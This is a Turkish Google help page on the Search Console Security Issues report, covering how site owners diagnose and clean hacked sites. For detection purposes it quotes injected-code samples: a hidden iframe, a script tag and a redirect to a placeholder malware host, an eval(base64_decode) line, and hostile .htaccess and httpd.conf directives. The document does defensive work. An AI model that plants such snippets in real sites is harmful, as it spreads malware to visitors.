Güvenlik Sorunları raporu

Bir Google değerlendirmesi sitenizin saldırıya uğradığını veya bir ziyaretçiye ya da bilgisayarına zarar verebilecek bir davranış sergilediğini tespit ederse Google’ın bulguları Güvenlik Sorunları raporunda gösterilir. Zararlı davranış örnekleri, kimlik avı saldırılarını veya kullanıcının bilgisayarına kötü amaçlı ya da istenmeyen yazılımlar yüklemeyi içerir.

Bir güvenlik sorunundan etkilenen sayfalar veya siteler, arama sonuçlarında uyarı etiketiyle görüntülenir veya kullanıcı bu sayfaları ziyaret etmeyi denediğinde tarayıcıda, uyarı amaçlı bir geçiş sayfası görüntülenebilir.

Güvenlik Sorunları Raporu'nu aç

 

Güvenlik sorunları nelerdir?

Güvenlik sorunları aşağıdaki kategorilere karşılık gelir:

  • Saldırıya uğramış içerik: Bu, sitenizdeki güvenlik açıkları nedeniyle izniniz olmadan sitenize konan içeriktir. Kullanıcılarımızı korumak amacıyla Google, saldırıya uğramış içeriği, arama sonuçlarımızın dışında tutmak için elinden geleni yapar. Daha fazla bilgi
  • Kötü amaçlı yazılımlar ve istenmeyen yazılımlar: Bunlar, bir cihaza veya kullanıcılarına zarar vermek üzere tasarlanmış, aldatıcı veya beklenmedik uygulamalarda bulunan ya da kullanıcıyı olumsuz yönde etkileyen yazılımlardır. Daha fazla bilgi
  • Sosyal mühendislik: Ziyaretçileri gizli bilgileri açıklamak ve yazılım indirmek gibi tehlikeli bir şey yapmaları için kandıran içeriktir. Daha fazla bilgi.

Sitemde güvenlik sorunları var mı?

Güvenlik sorunlarınız varsa raporun üst kısmında, sitenizde bulunan tüm güvenlik sorunlarının sayısını görürsünüz.

Sitenizle ilgili bir güvenlik sorunu yoksa yeşil bir onay işareti ve uygun bir mesaj görünür.

Ama bu siteyi yeni satın aldım.

Yakın bir zamanda, önceden güvenlik sorunları olan bir site satın aldıysanız Güvenlik Sorunları raporunda listelenen sorunları düzeltin, ardından yeniden değerlendirme isteğinizde siteyi yeni aldığınızı, sitenin artık Google Web Yöneticisi Yönergeleri'ne uygun olduğunu bize bildirin.

Etkilenen sayfaları görme

Etkilenen URL'lere örneklerin bulunduğu bir listeyi görmek için bir sorun açıklamasını genişletin. Bu kapsamlı bir liste değildir, yalnızca sitenizdeki seçilen sorundan etkilenen sayfaların bir örneğidir. Bazen herhangi bir örnek URL'nin olmadığı bir güvenlik sorununuz olabilir. Bu, hiçbir sayfanın etkilenmediği anlamına gelmez, yalnızca bir nedenden dolayı örnekleri oluşturamadığımızı gösterir.

Sorun ayrıntılarında, kısa bir açıklama ve sorunla ilgili daha fazla bilgi edinmek için bir bağlantının yanı sıra sorunun sitenizde ilk kez tespit edildiği tarih de gösterilir.

Sorunu çözme

Sitenizdeki bir güvenlik sorununu düzeltmek için:

  1. Güvenlik Sorunları raporunda sorun açıklamasını genişletin.
  2. Sorunun açıklamasını okuyun, ayrıntılı bilgileri ve sorunu düzeltmek için gerçekleştirilmesi gereken adımlar için "Daha fazla bilgi" bağlantısını takip edin. (Daha fazla bilgi bağlantıları, bu sayfanın alt kısmında belirtilen açıklamalara işaret eder.)
  3. Sorununuzu gidermek ve düzeltmek için ayrıntılar bölümünde sağlanan etkilenen sayfalar örneğini kullanın. Bu kapsamlı bir liste değildir, yalnızca sitenizdeki bu sorundan etkilenen sayfaların bir örneğidir. Herhangi bir örnek URL'nin olmadığı bir güvenlik sorununuz olabilir. Bu, hiçbir sayfanın etkilenmediği anlamına gelmez, yalnızca bir nedenden dolayı örnekleri oluşturamadığımızı gösterir.
  4. Sorunu sitenizin genelinde düzeltin. Sorunu yalnızca bazı sayfalarda düzelttiğinizde, arama sonuçlarına kısmi bir geri dönüş elde etmezsiniz.
  5. Raporda sitenizi etkileyen birden fazla güvenlik sorununu listeleniyorsa bunların tümünü düzeltin.
  6. Düzeltmelerinizi test edin.
  7. Raporda listelenen tüm sorunlar tüm sayfalarda düzeltildiğinde, Güvenlik Sorunları raporunda İnceleme İsteğinde Bulunun'u seçin. Yeniden değerlendirme isteğinizde düzeltmelerinizi açıklayın. İyi bir isteğin üç özelliği vardır:
    • Sitenizdeki sorunun tam olarak ne olduğunu açıklar.
    • Sorunu gidermek için uyguladığınız adımları açıklar.
    • Yaptığınız çalışmaların sonucunu belgelendirir.
  8. Yeniden değerlendirme incelemelerinin tamamlanması bir veya iki hafta sürebilir. İlerleme durumuyla ilgili olarak e-posta yoluyla bilgilendirilirsiniz. İsteğinizi gönderdiğinizde, incelemenin devam ettiğini size bildiren bir inceleme onayı mesajı alırsınız. Bekleyen isteğinizle ilgili nihai bir karar elinize ulaşmadan isteğinizi yeniden göndermeyin.

Yeniden değerlendirme incelemem ne kadar sürecek?

En fazla bir veya iki hafta. İsteğinizi aldığımızda e-posta ile bilgilendirilirsiniz. Böylece, incelemenizin etkin olduğunu bilirsiniz. İnceleme tamamlandığında da bir e-posta alırsınız.

Bekleyen isteklerle ilgili bir karar elinize ulaşmadan lütfen isteğinizi yeniden göndermeyin. Sorun düzeltilmeden gönderilecek bir yeniden değerlendirme isteği, bir sonraki istek için geri dönüş süresinin uzamasına, hatta sürekli ihlal durumuyla işaretlenmenize neden olabilir.

Güvenlik sorunları listesi

Burada, olası güvenlik sorunlarının bir listesini ve her bir sorunun nasıl düzeltileceği hakkında bilgileri bulabilirsiniz. Sorunlar, hata veya uyarı olarak sınıflandırılır.

Aldatıcı sayfalar

Siteniz, ziyaretçileri gizli bilgileri açıklamak ve yazılım indirmek gibi tehlikeli bir şey yapmaları için kandıran içerik barındırmaktadır. Google Güvenli Tarama, sürekli olarak aldatıcı içerik görüntüleyen sayfaları ziyaret etmeden önce web kullanıcılarını uyararak korur.

Web sayfaları aşağıdaki durumlarda aldatıcı olarak değerlendirilir:

  • Kendi cihazınız veya tarayıcınız ya da web sitesinin kendisi gibi güvenilen bir varlığa benzer şekilde hareket etmesi veya görünmesi ya da
  • Şifre paylaşma, teknik destek numarasını arama ya da yazılım indirme gibi sadece güvenilir bir varlıkta yapacağınız işlemler gerçekleştirmeniz için sizi kandırmaya çalışması.

Bu tür aldatıcı içerik sosyal mühendislik olarak adlandırılır. Sosyal mühendislik hakkında daha fazla bilgi edinin veya aldatıcı sayfa örneklerine bakın.

Sorunu çözme

1. Sorunu onaylayın

Aldatıcı içeriği aramak için örnek sayfaları ziyaret edin. Sitenizi hem mobil hem de masaüstü görünümlerinde incelemek için URL Denetleme aracını kullanabilirsiniz.

2. Sayfalarınızı düzeltin

Sosyal mühendislik uygulamalarına dahil olan sayfaları düzeltin. Güvenli Tarama'nın bir web sayfasını hatalı sınıflandırdığını düşünüyorsanız lütfen buradan bildirin.

3. İnceleme isteğinde bulunun

Sitenizde sorunun düzeldiğini onayladığınızda, Güvenlik Sorunları raporunda bir güvenlik incelemesi isteyin. İncelemenin tamamlanması birkaç gün ile birkaç hafta arasında sürebilir.

Aldatıcı yerleştirilmiş kaynaklar

Siteniz, ziyaretçileri gizli bilgileri açıklamak ve istenmeyen yazılım indirmek gibi tehlikeli bir şey yapmaları için kandıran aldatıcı reklamlar veya yerleşik kaynaklar barındırmaktadır. Aldatıcı içerik, sayfaya yerleştirilen resimler, diğer üçüncü taraf bileşenleri veya reklamlar gibi kaynaklar aracılığıyla eklenmiş olabilir. Google Güvenli Tarama, sürekli olarak aldatıcı içerik görüntüleyen sayfaları ziyaret etmeden önce web kullanıcılarını uyararak korur.

Bazen bu içerik ana makine sayfasında kullanıcılara gösterilir; diğer durumlarda ana makine sitesinde görünür reklam bulunmaz. Ancak site kullanıcıları pop-up'lar, arkada açılan sayfalar ya da diğer tür yönlendirmeler aracılığı ile kötü niyetli sayfalarına yönlendirir. Her durumda, bu tür yerleşik içerikler ana makine sayfası açısından bir politika ihlaline neden olur.

Bu tür aldatıcı içerik sosyal mühendislik olarak adlandırılır. Sosyal mühendislik hakkında daha fazla bilgi edinin veya aldatıcı yerleşik kaynak örneklerine bakın.

Sorunu çözme

1. Sorunu onaylayın

Aldatıcı içeriği aramak için örnek sayfaları ziyaret edin. Sitenizdeki sayfalarda bulunan reklamların, resimlerin veya diğer yerleşik üçüncü taraf kaynaklarının aldatıcı olmadığını doğrulayın. Reklam ağlarının sitenizin sayfalarında gösterilen reklamları dönüşümlü yayınlayabileceğini unutmayın. Dolayısıyla, sosyal mühendislik reklamlarını görebilmeniz için sayfayı birkaç kez yenilemeniz gerekebilir. Bazı reklamlar mobil cihazlarda ve masaüstü bilgisayarlarda farklı görünebilir. Sitenizi hem mobil hem de masaüstü görünümlerinde incelemek için URL Denetleme aracını kullanabilirsiniz.

2. Aldatıcı reklamları veya kaynakları kaldırın

Sitenizde yer alan üçüncü taraf kaynaklarını kontrol edin. Sitenizdeki sayfalarda bulunan reklamların, resimlerin veya diğer yerleşik üçüncü taraf kaynaklarının aldatıcı olmadığından emin olun. Sosyal mühendislik uygulamalarına dahil olan sayfaları düzeltin. 

3. İnceleme isteğinde bulunun

Sitenizde sorunun düzeldiğini onayladığınızda, Güvenlik Sorunları raporunda bir güvenlik incelemesi isteyin. İncelemenin tamamlanması birkaç gün ile birkaç hafta arasında sürebilir.

Kötü amaçlı yazılım
Bir bilgisayar korsanı tarafından sitenize kötü amaçlı yazılım bulaştırılmıştır veya siteniz kötü amaçlı yazılım barındırmaktadır. Kötü amaçlı yazılım, bir bilgisayara, mobil cihaza, çalıştırdığı yazılıma veya kullanıcılarına zarar vermek için özel olarak tasarlanmış herhangi bir yazılım ya da mobil uygulamadır.

1. Bu sorunu düzeltip düzeltemeyeceğinize karar verin

Sitenizdeki kötü amaçlı yazılım sorununun düzeltilmesi, sitenizle ilgili kodu okuyabilmenizi ve muhtemelen web sunucusu yapılandırmalarını anlayabilmenizi gerektirir. Bunu rahatlıkla yapamayacağınızı düşünüyorsanız yardım bulma konusunda bilgi edinmek için Destek ekibi oluşturma konusunu okuyun.

2. Kötü amaçlı yazılım sorununuzu teşhis edip düzeltin

Birçok kötü amaçlı yazılım türü vardır. Sizin için sorun yaratan kötü amaçlı yazılım türünü teşhis edip düzeltmeye çalışmak için aşağıdaki bölümleri okuyun. Sitenize birden fazla kötü amaçlı yazılım türünün bulaşmış olabileceğini unutmayın; teşhisinizde ve site temizliğinde dikkatli olun.

Kötü amaçlı yazılım türü: Sunucu yapılandırması

Açıklama

Bir bilgisayar korsanı sitenizin güvenliğini ihlal etmiş ve muhtemelen sunucunuzun yapılandırma dosyalarını değiştirerek ziyaretçileri iyi sitenizden kötü amaçlı kendi saldırı sitesine yönlendirmiştir. Sunucu yapılandırma dosyaları genellikle site yöneticisinin bir web sitesindeki belirli sayfalar veya dizinler için URL yönlendirmeleri belirtmesine olanak verir. Örneğin, Apache sunucularında bunlar .htaccess ve httpd.conf dosyalarıdır.

Sorunu düzeltme

1. Sorunu onaylayın

Güvenlik Sorunları raporunda gösterilen örnek URL’lerin bazılarını ziyaret edin.

Sitenizdeki zararlı kod bulaşmış sayfaları doğrudan görüntülemek için tarayıcı kullanmaktan kaçının.

Kötü amaçlı yazılımlar çoğunlukla tarayıcılardaki güvenlik açıklarını kullanarak yayıldığından, kötü amaçlı yazılımın bulaştığı bir sayfayı bir tarayıcıda açmak bilgisayarınıza zarar verebilir. Ayrıca, bilgisayar korsanları, spam içeriklerinin site sahipleri tarafından tespit edilmesini önlemek için gizleme teknikleri kullanabilirler.

İçeriği bilgisayarınızda daha güvenli bir şekilde görüntülemek için iki alternatif yöntem aşağıda verilmiştir:

  • Sayfanızı Google'ın gördüğü gibi görmek için URL Denetleme aracını kullanın. Çoğu bilgisayar korsanı yalnızca Google makineleri tarafından görünen değişiklikler yaptığı için bu yöntem faydalıdır. Örneğin, sitenizden kendi sitelerine bağlantılar ekleyip bunların yalnızca yönlendiren Google olduğunda oluşturulmasını sağlayabilirler.
  • Komut satırından HTTP istekleri (bir sayfayı getirmek gibi) gerçekleştirmek için cURL veya Wget araçlarını kullanın. Ücretsiz kullanılabilen bu araçlar yönlendirmeleri teşhis etmeye yardımcı olur ve yönlendiren veya kullanıcı aracısı bilgilerini belirtme olanağı sunar. Bilgisayar korsanları, tespit edilmekten kaçınmak ve daha iyi hedefler seçmek için genellikle yalnızca belirli kullanıcı aracılarına veya yönlendirenlere saldırırlar. Bu araçları kullanmak hedefi taklit etmenizi sağlar. İsteğiniz spam içerikli davranış ortaya çıkarmıyorsa, farklı yönlendirme adreslerini (büyük web sitelerinden veya farklı arama motorlarından gelen bağlantılar gibi) kullanmayı deneyin. Örneğin, bir Windows makinesinde Google Arama sonuçlarından www.example.com/page.html adresine giden bir bağlantıyı takip eden kullanıcıyı taklit etmek için cURL'yi şu şekilde kullanırsınız:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

"Sunucu yapılandırması" enfeksiyonu bulaşmış bir sayfanın yanıtı aşağıdaki üst bilgileri içerebilir:

...
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

2. Sitenizi "sunucu yapılandırması" kötü amaçlı yazılımından temizleyin

Kabuk/terminal erişimi üzerinden sunucunuza giriş yapın (isterseniz site çevrimdışı olabilir) ve ilgili sunucu yapılandırma dosyalarını inceleyin. Sitenizde saldırıya uğramış birden fazla sunucu yapılandırma dosyası olabilir. Bu dosyalarda, bilgisayar korsanının sitenizi bilinmeyen kötü amaçlı yazılım saldırı sitelerine yönlendirme yapacak şekilde yapılandırabileceği istenmeyen yönergeleri (ör. yönlendirmeler) kontrol edin. Örneğin, .htaccess dosyasında şunun gibi bir yönlendirme görebilirsiniz:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<kötü-amaçlı-yazılım-sitesi>/index.html [R=301]

 

Buna ek olarak:

  • Bilgisayar korsanının, kolayca gözden kaçabileceğini düşünerek dosyanın sonuna kendi kodunu eklediği durumlar için tüm dosyayı kontrol ettiğinizden emin olun.
  • Bilgisayar korsanının .htaccess dosyasını sürekli olarak güncellemesi için tasarlayıp oluşturduğu olası cron işlerini araştırın. Cron işleri, aralarında /etc/crontab (ayrıca birçok /etc/cron* dizini) ve /var/spool/cron dizinlerinin de bulunduğu birkaç yerde listelenebilir.
  • Sitenizle ilgili olarak temizlik adımlarını ve sitenizin tekrar saldırıya uğramasını önlemeye yönelik ipuçlarını da içeren eksiksiz bir düzeltme akışı için Saldırıya uğramış siteler kılavuzunu okuyun.
Kötü amaçlı yazılım türü: SQL yerleştirme

Açıklama

Bir bilgisayar korsanı büyük olasılıkla sitenizin veritabanının güvenliğini ihlal etmiştir. Örneğin, bilgisayar korsanı programlı bir şekilde bir veritabanı tablosunun her kaydına kötü amaçlı kod yerleştirmiş olabilir. Böylece, sunucu, veritabanından bilgi gerektiren bir sayfa yüklediğinde kötü amaçlı kod artık sayfanın içeriğine yerleştirilir ve site ziyaretçilerine zarar verebilir.

Sorunu düzeltme

1. Sorunu onaylayın

Komut satırından, etkilenen URL'lerde bazı sorgular çalıştırın ve "iframe" veya "eval" gibi SQL saldırı kelimeleri için verilen yanıtları inceleyin.

Sitenizdeki zararlı kod bulaşmış sayfaları doğrudan görüntülemek için tarayıcı kullanmaktan kaçının.

Kötü amaçlı yazılımlar çoğunlukla tarayıcılardaki güvenlik açıklarını kullanarak yayıldığından, kötü amaçlı yazılımın bulaştığı bir sayfayı bir tarayıcıda açmak bilgisayarınıza zarar verebilir. Ayrıca, bilgisayar korsanları, spam içeriklerinin site sahipleri tarafından tespit edilmesini önlemek için gizleme teknikleri kullanabilirler.

İçeriği bilgisayarınızda daha güvenli bir şekilde görüntülemek için iki alternatif yöntem aşağıda verilmiştir:

  • Sayfanızı Google'ın gördüğü gibi görmek için URL Denetleme aracını kullanın. Çoğu bilgisayar korsanı yalnızca Google makineleri tarafından görünen değişiklikler yaptığı için bu yöntem faydalıdır. Örneğin, sitenizden kendi sitelerine bağlantılar ekleyip bunların yalnızca yönlendiren Google olduğunda oluşturulmasını sağlayabilirler.
  • Komut satırından HTTP istekleri (bir sayfayı getirmek gibi) gerçekleştirmek için cURL veya Wget araçlarını kullanın. Ücretsiz kullanılabilen bu araçlar yönlendirmeleri teşhis etmeye yardımcı olur ve yönlendiren veya kullanıcı aracısı bilgilerini belirtme olanağı sunar. Bilgisayar korsanları, tespit edilmekten kaçınmak ve daha iyi hedefler seçmek için genellikle yalnızca belirli kullanıcı aracılarına veya yönlendirenlere saldırırlar. Bu araçları kullanmak hedefi taklit etmenizi sağlar. İsteğiniz spam içerikli davranış ortaya çıkarmıyorsa, farklı yönlendirme adreslerini (büyük web sitelerinden veya farklı arama motorlarından gelen bağlantılar gibi) kullanmayı deneyin. Örneğin, bir Windows makinesinde Google Arama sonuçlarından www.example.com/page.html adresine giden bir bağlantıyı takip eden kullanıcıyı taklit etmek için cURL'yi şu şekilde kullanırsınız:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Daha sonra, veritabanı sunucunuza giriş yapın veya veritabanınızı phpMyAdmin gibi bir araçla görüntüleyin. Wget veya cURL kullandıysanız Wget veya cURL aracılığıyla sayfanın kaynak kodunda bulunan hasarı, gerçek veritabanı girişleriyle ilişkilendirmeyi deneyin. Örneğin, sayfalarınızda tehlikeli bir iframe fark ettiyseniz iframe kodunu arayan bir SQL sorgusu gerçekleştirebilirsiniz. Örneğin:

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%';

Sunucunuzdaki veritabanı günlüğünde ve hata dosyalarında, normal kullanıcılar için anormal görünen beklenmedik SQL komutları veya hatalar gibi olağandışı etkinlikleri kontrol etmek de isteyebilirsiniz.

2. Sitenizi temizleyin

Sitenizi temizlemeye hazır olduğunuzda, kod bulaşan tüm veritabanı kayıtlarını güncelleyebilir veya bilinen son veritabanı yedeğinizi geri yükleyebilirsiniz.

Buna ek olarak:

Kötü amaçlı yazılım türü: Kod yerleştirme

Açıklama

Sitenizdeki sayfalar, bir kötü amaçlı yazılım saldırısı sitesi için yapılan iframe gibi kötü amaçlı kod içerecek şekilde değiştirilmiştir.

Sorunu düzeltme

1. Sorunu onaylayın

Güvenlik Sorunları raporunda enfeksiyonun bulaştığı belirtilen URL’leri ziyaret edin. Yanıtların HTML’sinde kötü amaçlı kod olup olmadığını inceleyin.

Sitenizdeki zararlı kod bulaşmış sayfaları doğrudan görüntülemek için tarayıcı kullanmaktan kaçının.

Kötü amaçlı yazılımlar çoğunlukla tarayıcılardaki güvenlik açıklarını kullanarak yayıldığından, kötü amaçlı yazılımın bulaştığı bir sayfayı bir tarayıcıda açmak bilgisayarınıza zarar verebilir. Ayrıca, bilgisayar korsanları, spam içeriklerinin site sahipleri tarafından tespit edilmesini önlemek için gizleme teknikleri kullanabilirler.

İçeriği bilgisayarınızda daha güvenli bir şekilde görüntülemek için iki alternatif yöntem aşağıda verilmiştir:

  • Sayfanızı Google'ın gördüğü gibi görmek için URL Denetleme aracını kullanın. Çoğu bilgisayar korsanı yalnızca Google makineleri tarafından görünen değişiklikler yaptığı için bu yöntem faydalıdır. Örneğin, sitenizden kendi sitelerine bağlantılar ekleyip bunların yalnızca yönlendiren Google olduğunda oluşturulmasını sağlayabilirler.
  • Komut satırından HTTP istekleri (bir sayfayı getirmek gibi) gerçekleştirmek için cURL veya Wget araçlarını kullanın. Ücretsiz kullanılabilen bu araçlar yönlendirmeleri teşhis etmeye yardımcı olur ve yönlendiren veya kullanıcı aracısı bilgilerini belirtme olanağı sunar. Bilgisayar korsanları, tespit edilmekten kaçınmak ve daha iyi hedefler seçmek için genellikle yalnızca belirli kullanıcı aracılarına veya yönlendirenlere saldırırlar. Bu araçları kullanmak hedefi taklit etmenizi sağlar. İsteğiniz spam içerikli davranış ortaya çıkarmıyorsa, farklı yönlendirme adreslerini (büyük web sitelerinden veya farklı arama motorlarından gelen bağlantılar gibi) kullanmayı deneyin. Örneğin, bir Windows makinesinde Google Arama sonuçlarından www.example.com/page.html adresine giden bir bağlantıyı takip eden kullanıcıyı taklit etmek için cURL'yi şu şekilde kullanırsınız:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Burada bazı kötü amaçlı kod örneklerini görebilirsiniz:

  • Kötü amaçlı bir site yükleyen iframe:
    <iframe frameborder="0" height="0" src="http://<kötü-amaçlı-yazılım-sitesi>/path/file" 
      style="display:none" width="0"></iframe>
  • Bir saldırı sitesinden komut dosyası çağıran veya çalıştıran JavaScript veya başka bir kodlama dili:
    <script type='text/javascript' src='http://<kötü-amaçlı-yazılım-sitesi>/js/x55.js'></script>
  • Tarayıcıyı bir saldırı sitesine yönlendiren komut dosyaları:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<kötü-amaçlı-yazılım-sitesi>/");
      }
    </script>
  • Algılanmamak için şaşırtma yapan zararlı kodlar:
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • Aksi halde yararlı komut dosyalarına rastgele bir şekilde zararlı kodlar yazmak üzere tasarlanmış paylaşılan nesne dosyaları:
    #httpd.conf bilgisayar korsanı tarafından değiştirildi
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

Sitedeki zararlı olabilecek tüm kodları araştırın. iframe kodunu bulmak için "iframe" gibi kelimeleri aramak da yardımcı olabilir. Diğer yardımcı anahtar kelimeler "script", "eval" ve "unescape"tir. Örneğin, Unix tabanlı sistemlerdeki tüm dosyalarda "iframe" kelimesini aramak için:

$grep -irn "iframe" ./ | less

2. Sitenizi temizleyin

Sitenizi temizlemeye hazır olduğunuzda, etkilenen dosyaları eldeki en son iyi yedekle değiştirebilir veya yerleştirilen kodu her bir sayfadan ve ilgili tüm komut dosyası işlevlerinden veya dosyalarından kaldırabilirsiniz. Sunucu yapılandırma dosyalarını değiştirdiyseniz, değişikliklerin geçerli olabilmesi için web sunucunuzu yeniden başlatmanız gerekebilir.

Buna ek olarak:

Kötü amaçlı yazılım türü: hata şablonu

Açıklama

404 Dosya Bulunamadı gibi hata mesajları için kullanılan şablon kötü amaçlı yazılım dağıtmak üzere yapılandırılmıştır. Bu şekilde, saldırganlar sitenizde bulunmayan URL'lerden dahi saldırı başlatabilir.

Sorunu düzeltme

1. Sorunu onaylayın

Sitenizde var olmayan veya başka bir hata türü veren bir sayfa isteyin ve yanıtın başka bir siteden gelip gelmediğini veya kötü amaçlı yazılım içerip içermediğini inceleyin.

Sitenizdeki zararlı kod bulaşmış sayfaları doğrudan görüntülemek için tarayıcı kullanmaktan kaçının.

Kötü amaçlı yazılımlar çoğunlukla tarayıcılardaki güvenlik açıklarını kullanarak yayıldığından, kötü amaçlı yazılımın bulaştığı bir sayfayı bir tarayıcıda açmak bilgisayarınıza zarar verebilir. Ayrıca, bilgisayar korsanları, spam içeriklerinin site sahipleri tarafından tespit edilmesini önlemek için gizleme teknikleri kullanabilirler.

İçeriği bilgisayarınızda daha güvenli bir şekilde görüntülemek için iki alternatif yöntem aşağıda verilmiştir:

  • Sayfanızı Google'ın gördüğü gibi görmek için URL Denetleme aracını kullanın. Çoğu bilgisayar korsanı yalnızca Google makineleri tarafından görünen değişiklikler yaptığı için bu yöntem faydalıdır. Örneğin, sitenizden kendi sitelerine bağlantılar ekleyip bunların yalnızca yönlendiren Google olduğunda oluşturulmasını sağlayabilirler.
  • Komut satırından HTTP istekleri (bir sayfayı getirmek gibi) gerçekleştirmek için cURL veya Wget araçlarını kullanın. Ücretsiz kullanılabilen bu araçlar yönlendirmeleri teşhis etmeye yardımcı olur ve yönlendiren veya kullanıcı aracısı bilgilerini belirtme olanağı sunar. Bilgisayar korsanları, tespit edilmekten kaçınmak ve daha iyi hedefler seçmek için genellikle yalnızca belirli kullanıcı aracılarına veya yönlendirenlere saldırırlar. Bu araçları kullanmak hedefi taklit etmenizi sağlar. İsteğiniz spam içerikli davranış ortaya çıkarmıyorsa, farklı yönlendirme adreslerini (büyük web sitelerinden veya farklı arama motorlarından gelen bağlantılar gibi) kullanmayı deneyin. Örneğin, bir Windows makinesinde Google Arama sonuçlarından www.example.com/page.html adresine giden bir bağlantıyı takip eden kullanıcıyı taklit etmek için cURL'yi şu şekilde kullanırsınız:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. Sitenizi temizleyin

Web sunucunuza giriş yapın ve sunucu yapılandırma dosyalarınızda hata sayfası yönergelerini arayın. Örneğin, Apache web sunucularına ilişkin hata şablonu .htaccess dosyasında açıklanabilir. Burada, kötü amaçlı bir siteden 404 hata sayfaları alan bir örnek .htaccess dosyası girişi görebilirsiniz:

ErrorDocument 404 http://<kötü-amaçlı-yazılım-sitesi>/index.html 

Sitenizi temizlemeye hazır olduğunuzda, .htaccess dosyalarını bilinen iyi bir yedekle değiştirebilir veya mevcut .htaccess dosyalarındaki istenmeyen ErrorDocument yönergelerini silebilirsiniz. Sitenizde varsa gerçek hata dosyalarını da temizlediğinizden emin olun. Son olarak, tüm değişikliklerin etkin hale geldiğinden emin olmak için web sunucunuzu yeniden başlatın.

Buna ek olarak:

Kötü amaçlı yazılım türü: Siteler arası kötü amaçlı yazılım

Açıklama

Site, kötü amaçlı içerik barındırdığı bilinen bir web sitesinden içerik yüklemektedir. Chrome'da bu, aşağıdaki grafikle arada duran bir tarayıcı olarak ifade edilir:

cross-site malware warning

Sorunu düzeltme​

  1. Güvenlik Sorunları raporunda listelenen örnek URL’lerin birkaçına göz atarak sorunu onaylayın. Siteler arası kötü amaçlı yazılım sorunu söz konusuysa yukarıdaki grafiği görürsünüz.
  2. Tarayıcı uyarısı şüpheli içeriğin alan adı konusunda size bilgi verir. Tarayıcı uyarısında listelenen işaretli siteye yönelik tüm referansları kaldırın.
  3. Sitenizdeki bir sayfanın, işaretli bir siteden bilginiz dışında içerik içerdiğini keşfederseniz sorun daha ciddidir ve sitenizin güvenliği büyük olasılıkla ihlal edilmiştir. Her iki durumda da, Google sitenizin karantinaya alınması, hasarın değerlendirilmesi ve sitenizi temizlemesi için Saldırıya Uğramış Siteler İçin Yardım kurtarma protokolünü önerir.
  4. Sitenizdeki tüm sosyal mühendislik içeriğini kaldırdıktan sonra, Güvenlik Sorunları raporunda bir güvenlik incelemesi isteyin. İncelemenin tamamlanması birkaç gün ile birkaç hafta arasında sürebilir.
  5. Sonradan işaretlenen yasal bir siteden bilinçli olarak içerik eklediyseniz ve işaretli sitenin işareti kaldırıldıktan sonra içeriği tekrar eklemek isterseniz işaretli site için Google Güvenli Tarama teşhis sayfasını kullanarak söz konusu sitenin durumunu izleyebilirsiniz (http://www.google.com/safebrowsing/diagnostic?site=www.example.com). Yasal siteler genellikle hızlı bir şekilde sahipleri tarafından temizlenir.
Diğer kötü amaçlı yazılım türleri

Sitenizi etkileyebilecek başka birçok kötü amaçlı yazılım türü vardır. Diğer bilgisayar korsanlığı türlerini teşhis etme ve düzeltme hakkında daha fazla ipucu için Web'in Temelleri sitesine bakın. Sitenizi düzelttikten sonra bir inceleme isteğinde bulunduğunuzdan emin olun.

3. İnceleme isteğinde bulunun

Sitenizde sorunun düzeldiğini onayladığınızda, Güvenlik Sorunları raporunda bir güvenlik incelemesi isteyin. İncelemenin tamamlanması birkaç gün ile birkaç hafta arasında sürebilir.

Saldırı türü: Kod yerleştirme

Bir bilgisayar korsanı sitenizin güvenliğini ihlal etmiştir ve sayfalarınıza kötü amaçlı kod yerleştirmektedir. Kötü amaçlı bir siteye yönlendirmeler veya sayfa açıkken tarayıcınızda kripto para birimi madenciliği yazılımı çalıştırma, buna örnek olarak gösterilebilir.

1. Bu sorunu düzeltip düzeltemeyeceğinize karar verin

Bu sorunu kendi başınıza düzeltmek için nelerin gerekli olabileceği veya bunun becerilerinizin dışında olduğunu düşünürseniz nasıl yardım bulacağınız konusunda bir fikir edinmek için Destek ekibi oluşturma konusuna bakın.

2. Sorunu onaylayın

Sitenizdeki zararlı kod bulaşmış sayfaları doğrudan görüntülemek için tarayıcı kullanmaktan kaçının.

Kötü amaçlı yazılımlar çoğunlukla tarayıcılardaki güvenlik açıklarını kullanarak yayıldığından, kötü amaçlı yazılımın bulaştığı bir sayfayı bir tarayıcıda açmak bilgisayarınıza zarar verebilir. Ayrıca, bilgisayar korsanları, spam içeriklerinin site sahipleri tarafından tespit edilmesini önlemek için gizleme teknikleri kullanabilirler.

İçeriği bilgisayarınızda daha güvenli bir şekilde görüntülemek için iki alternatif yöntem aşağıda verilmiştir:

  • Sayfanızı Google'ın gördüğü gibi görmek için URL Denetleme aracını kullanın. Çoğu bilgisayar korsanı yalnızca Google makineleri tarafından görünen değişiklikler yaptığı için bu yöntem faydalıdır. Örneğin, sitenizden kendi sitelerine bağlantılar ekleyip bunların yalnızca yönlendiren Google olduğunda oluşturulmasını sağlayabilirler.
